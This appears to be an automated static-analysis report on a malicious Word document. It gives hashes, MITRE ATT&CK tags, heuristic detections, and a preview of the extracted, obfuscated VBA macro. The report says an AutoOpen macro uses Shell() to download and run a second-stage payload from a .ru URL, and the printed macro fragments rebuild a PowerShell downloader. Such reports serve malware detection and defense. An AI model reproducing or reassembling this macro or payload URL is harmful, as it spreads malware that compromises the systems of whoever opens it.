Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9bac332861154e75…

MALICIOUS

Office (OLE)

156.5 KB Created: 2017-11-28 15:08:00 Authoring application: Microsoft Office Word First seen: 2017-12-08
MD5: 0ea5bfb146ac2909e35b25dce4443f4e SHA-1: 61947e2fc91c999a5fe5c67a8558d4dd6a4bb8c2 SHA-256: 9bac332861154e7525507782da958c9b65c491e84481a5ef1969a7250b46160c
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() command. This macro is designed to download and execute a second-stage payload from the reconstructed URL 'http://mpexNiD+NiDk2+xk2xNiD+NiDxNiD+NiDk2+xk2po.ru/JCxk2+U8Q5K7MT5hHKnO'. The presence of obfuscation and the use of Shell() indicate a malicious intent to compromise the user's system.

Heuristics 7

  • ClamAV: Doc.Macro.Obfuscation-6387400-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 77636 bytes
SHA-256: 844120f47d3e7246f0cca90600aa2ae221439e248f0cfa22378c625ebe5e894b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VDSRUklOd"
Function wmsFvhNAC()
TwDriPdc = Array(StrReverse("waXhnlqKwl"), StrReverse("ltwIFuwUsC"), StrReverse("vniijjUSkV"), StrReverse("rJzdvTmIhd"), StrReverse("JXXXiojDjW"), StrReverse("OiIAoJwoBH"), StrReverse("RXZaubtVNm"), StrReverse("IonOtYPHAr"))
DNoqvutFjj = Mid("dSXxk2+xk2cexk2+xk2ption.Messxk2+xk2age;}}xk2)-CrEplaCe  xk2PJjx'+'k2,[Char]36 -CrEplaCe  ([Char]76+[Char]109+NiD+NiD[Char]73),[Char]39-CrEplaCe xk2sCyxk2,[Char'+']92) )NiD'+'+NiD Ni'+'D).RePlACNAiC6LP", 4, 191)
LiiWk = Array(StrReverse("dRIcvJjlXh"), StrReverse("uvwkOitMmV"), StrReverse("wnHFODOavC"), StrReverse("RuMdbvwLAA"), StrReverse("EmpHCiGnCO"), StrReverse("OjEChpJCNs"), StrReverse("uJpUPziTJT"), StrReverse("hhMlRLwADk"))
bnkvatqJLN = Array(StrReverse("zQmOGNBzol"), StrReverse("XzHZMlzwcH"), StrReverse("vOqtNartHQ"), StrReverse("tooJJAlLTh"), StrReverse("ZujbPLhNCH"), StrReverse("aTitwiasAj"), StrReverse("WHsYsiJzQL"), StrReverse("AmdvhBhPiC"))
sJmPRXPc = Array(StrReverse("LwzvwcfQwj"), StrReverse("KPAjjwdRPU"), StrReverse("iQsROpwNoL"), StrReverse("HZtupmdnWz"), StrReverse("kNNRIlJtlM"), StrReverse("KismTvFjhG"), StrReverse("dRcnYlVFru"), StrReverse("SqvSjRDbJc"))
qAAbGi = Mid("93Ettp://mpexNiD+NiDk2+xk2xNiD+NiDxNiD+NiDk2+xk2po.ru/JCxk2+U8Q5K7MT5hHKnO", 4, 57)
jPiMUrSD = Array(StrReverse("sirzpaKvNa"), StrReverse("asKmLRCIjj"), StrReverse("CkzqGopiLv"), StrReverse("BKOworQsiR"), StrReverse("YNjpkIcqkP"), StrReverse("wYfzAIjAsB"), StrReverse("kbjSZPdLwT"), StrReverse("BJaRIoAHGw"))
PMioskr = Array(StrReverse("jFccAYjHau"), StrReverse("jzGPTTlZtW"), StrReverse("PDCrtUnZCC"), StrReverse("siWEaYpzmz"), StrReverse("FOfwNVjjzQ"), StrReverse("jdinMcDkjj"), StrReverse("lGEYCCaBov"), StrReverse("dlntRBYFdX"))
szDtqBXFZMl = Array(StrReverse("YHKDTmnojt"), StrReverse("OJTbPwcdwD"), StrReverse("cRYuACMDNX"), StrReverse("dOulCQzKNH"), StrReverse("jJUPWIWdrH"), StrReverse("cvFZlHjQCR"), StrReverse("ZjbLQAPiYw"), StrReverse("ARPoUSwIXs"))
lvPCdcn = Mid("NfCV5nrJA1BMdH6((lGFrXA2ZzQRUYHnFqr6EA", 16, 2)
XlaWpUcE = Array(StrReverse("kHalVOwjrw"), StrReverse("UEPFOwJGuL"), StrReverse("virDmupoWL"), StrReverse("DzGLvdjTCn"), StrReverse("FqJqaZViiS"), StrReverse("sRKScCPXzb"), StrReverse("YHNjuWzEJk"), StrReverse("RqEGFEYBcN"))
iNvML = Array(StrReverse("fjMFvhJUAu"), StrReverse("hhIwiAhJzW"), StrReverse("toEtHKjQFS"), StrReverse("KbsKlqWVQj"), StrReverse("quhdQSJTGT"), StrReverse("knJBwrfSwl"), StrReverse("BsPhkGpwKs"), StrReverse("dMtQfzGado"))
jARPQKC = Array(StrReverse("jfLpifXWzv"), StrReverse("llirkPdbIa"), StrReverse("KbUoQUGAzf"), StrReverse("QKOfYzOfjc"), StrReverse("isNwHiRIvG"), StrReverse("BzjGFIKWYJ"), StrReverse("ZXZUfaWDSm"), StrReverse("BzufrSNWjl"))
KiYRzlihD = Mid("ltT' (NiD .( ucgPshomENiD+NiD[21]+ucgpshOMENiD+NiD[30]NiD+NiDuGfshAvZ", 4, 58)
TRPpXAHtJzi = Array(StrReverse("AMKlhXSqLt"), StrReverse("LEXiiwiAtK"), StrReverse("dLJOpYusWz"), StrReverse("lEpKkohiAN"), StrReverse("owmQjZoOhh"), StrReverse("UGjSKpDwvI"), StrReverse("cZULIGONtt"), StrReverse("QAzjVfYshQ"))
ddNcFXnMPij = Array(StrReverse("DwErdTbHZQ"), StrReverse("mrHXDLStSj"), StrReverse("HOpIEDCDPn"), StrReverse("uopmGaSiqL"), StrReverse("zOdCAJqXcf"), StrReverse("zTDzdpIvmZ"), StrReverse("QXsmVwCUQc"), StrReverse("tkDHhsknIv"))
rAMvMq = Array(StrReverse("aikLOLOjCU"), StrReverse("MUMajZpolN"), StrReverse("njjBbJAUSt"), StrReverse("hQnjzfDLJB"), StrReverse("hDCkwKARCO"), StrReverse("FVWacrwjkE"), StrReverse("LuNJnvhjdE"), StrReverse("WdikfjjwCR"))
OLiNPDjP = Mid("4Y0sZS7bpJ03j2CB02+xk2;PJjnsaxk2+xk2dasd = new-obxk2+xk2jectxk2+xk2 randomx'+'k2+xk2;PJjbcxk2+xk2dxk2+xk2 =xk2+xk2 LmIxk2+xk2hZWcqzbBWr", 18, 109)
YpYhBzwIHG = Array(StrReverse("NfbjnbkpIR"), StrReverse("SWwRvbWrjB"), StrReverse("HVGzmPQwSk"), StrReverse("EVnqMkwJwu"), StrReverse("NMMwKWolLG"), StrReverse("
... (truncated)